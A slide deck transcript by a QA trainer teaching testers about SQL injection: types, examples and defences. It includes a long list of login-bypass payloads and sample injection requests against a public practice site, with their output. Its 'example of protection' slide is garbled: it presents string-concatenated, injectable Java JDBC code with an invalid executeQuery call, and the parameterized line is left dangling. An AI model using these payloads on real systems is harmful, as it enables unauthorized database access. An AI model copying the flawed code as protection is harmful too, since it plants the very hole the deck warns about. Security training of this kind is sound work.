This document discusses SQL injections and how every tester needs to know about them. It covers the different types of SQL injections like error-based, union-based, boolean-based and time-based injections. Examples are provided for each type. The document also discusses ways to protect against SQL injections like parameterized statements, input validation, and access control. It emphasizes the importance of security testing and being aware of injection vulnerabilities.
2. ABOUT MYSELF
VLADIMIR ARUTIN
SENIOR QA at AB SOFT
ISTQB Certified Test Manager
ISTQB and QA Manual Training Instructor
Certified Coach, Public Speaker
3. OWASP TOP 10
1. INJECTION
2. BROKEN AUTHENTICATION
3. SENSITIVE DATA EXPOSURE
4. XML EXTERNAL ENTITIES (XXE)
5. BROKEN ACCESS CONTROL
6. SECURITY MISCONFIGURATION
7. CROSS-SITE SCRIPTING
8. INSECURE DESERIALIZATION
9. USING COMPONENTS WITH KNOWN VULNERABILITIES
10. INSUFFICIENT LOGGING AND MONITORING
15. SQL INJECTIONS
HOW DOES IT HAPPEN?
a web application does not validate values received from a web
form, cookie, input parameter, etc., before passing them
to SQL queries.
Your code uses unsanitized data from user input in SQL statements
A malicious user includes SQL elements in the input in a tricky way
Your code executes these SQL elements as part of legitimate SQL
statements
16. EXAMPLES
SELECT * FROM users WHERE username = ‘admin’- -’
AND password = ‘password’
SELECT * FROM users WHERE username ="" or ""=""
AND password ="" or ""=""
SELECT * FROM clients WHERE clientID = 105 OR 1=1
18. SQL INJECTIONS vocabulary
' or 1=1
' or 1=1–
' or 1=1#
' or 1=1/*
admin' –
admin' #
admin'/*
admin' or '1'='1
admin' or '1'='1'–
admin' or '1'='1'#
admin' or '1'='1'/*
admin'or 1=1 or ''='
admin' or 1=1
admin' or 1=1–
admin' or 1=1#
admin' or 1=1/*
admin') or ('1'='1
admin') or ('1'='1'–
admin') or ('1'='1'#
admin') or ('1'='1'/*
admin') or '1'='1
admin') or '1'='1'–
admin') or '1'='1'#
admin') or '1'='1'/*
1234 ' AND 1=0 UNION ALL SELECT 'admin',
'81dc9bdb52d04dc20036dbd8313ed055
admin" –
admin" #
admin"/*
admin" or "1"="1
admin" or "1"="1"–
admin" or "1"="1"#
admin" or "1"="1"/*
admin“ or 1=1 or ""=“
admin" or 1=1
19. SQL Injection Types
Error-based SQL injection
• The attacker creates the SQL injection to make the back-end display an error
• The back-end returns an error to the attacker
• The attacker uses information contained in the error to escalate the attack
• is used to access sensitive information (database type, file names, and more)
20. SQL Injection Types
Error-based SQL injection
Example: http://testphp.vulnweb.com/listproducts.php?cat=1′
Result: The web application displays the following error in the browser:
Error: You have an error in your SQL syntax; check the manual that
corresponds to your MySQL server version for the right syntax to use near ”’ at
line 1 Warning: mysql_fetch_array() expects parameter 1 to be resource,
boolean given in /hj/var/www/listproducts.php on line 74
21. SQL Injection Types
Union-based SQL injection
• The attacker uses a UNION clause in the payload
• The SQL engine combines sensitive information with legitimate
• information that the web application should display
• The web application displays sensitive information
22. SQL Injection Types
Example: http://testphp.vulnweb.com/artists.php?artist=-1 UNION SELECT
1,version(),current_user()
Result: The web application displays the system version and the name of the
current user:
5.1.73-0ubuntu0.10.04.1
acuart@localhost
Union-based SQL injection
23. SQL Injection Types
Boolean-based SQL injection
• The attacker sends many payloads that make the application
return a different resultS depending on TRUE or FALSE
• The attacker draws a conclusion from web application behavior
for each payload
• is often used to check whether any other SQL injections are
possible but it can also be used to access sensitive information
24. SQL Injection Types
Example:
http://testphp.vulnweb.com/artists.php?artist=1 AND 1=1
Payload 2:
http://testphp.vulnweb.com/artists.php?artist=1 AND 1=0
Result: In both cases, the application behaves differently. The attacker now
knows that the application is vulnerable to SQL injections.
Boolean-based SQL injection
25. SQL Injection Types
Time-based SQL injection
the attacker sends a payload that includes a time delay command such
as SLEEP, which delays the whole response
The attacker repeats the process as many times as possible with
different arguments
is used to guess the content of a database cell a character at a time by
using different ASCII values in conjunction with a time delay
28. WARNING
DON’T TRY THIS AT HOME
VLADIMIR ARUTIN, AB SOFT COMPANY AND IT STEP UNIVERSITY
DO NOT ADVOCATE REPLICATING THE ACTIONS IN THIS DEMO
AND DO NOT TAKE RESPONSIBILITY FOR THOSE WHO DO.
For Educational Purposes Only
29. How can you protect yourself?
Parameterized Statements
Stored procedures
Web application firewall
Whitelist Input Validation
Escaping All User Supplied Input
USE LIMIT IN SQL QUeRIES
Trust no one
Update and patch
Use appropriate privileges
Continuously monitor SQL statements from dB-connected apps
Buy better software
30. EXAMPLE OF PROTECTION
// Define which user we want to find.
String email = "user@email.com";
// Connect to the database.
Connection conn = DriverManager.getConnection(URL, USER, PASS);
Statement stmt = conn.createStatement();
// Construct the SQL statement we want to run, specifying the parameter.
String sql = "SELECT * FROM users WHERE email = '" + email + "'";
// Run the query, passing the 'email' parameter value...
ResultSet results = stmt.executeQuery(sql, email);
while (results.next()) {
// ...do something with the data returned.
}
String sql = "SELECT * FROM users WHERE email = ?";
34. WARNING
DON’T TRY THIS AT HOME
VLADIMIR ARUTIN, AB SOFT COMPANY AND IT STEP UNIVERSITY
DO NOT ADVOCATE REPLICATING THE ACTIONS IN THIS DEMO
AND DO NOT TAKE RESPONSIBILITY FOR THOSE WHO DO.
For Educational Purposes Only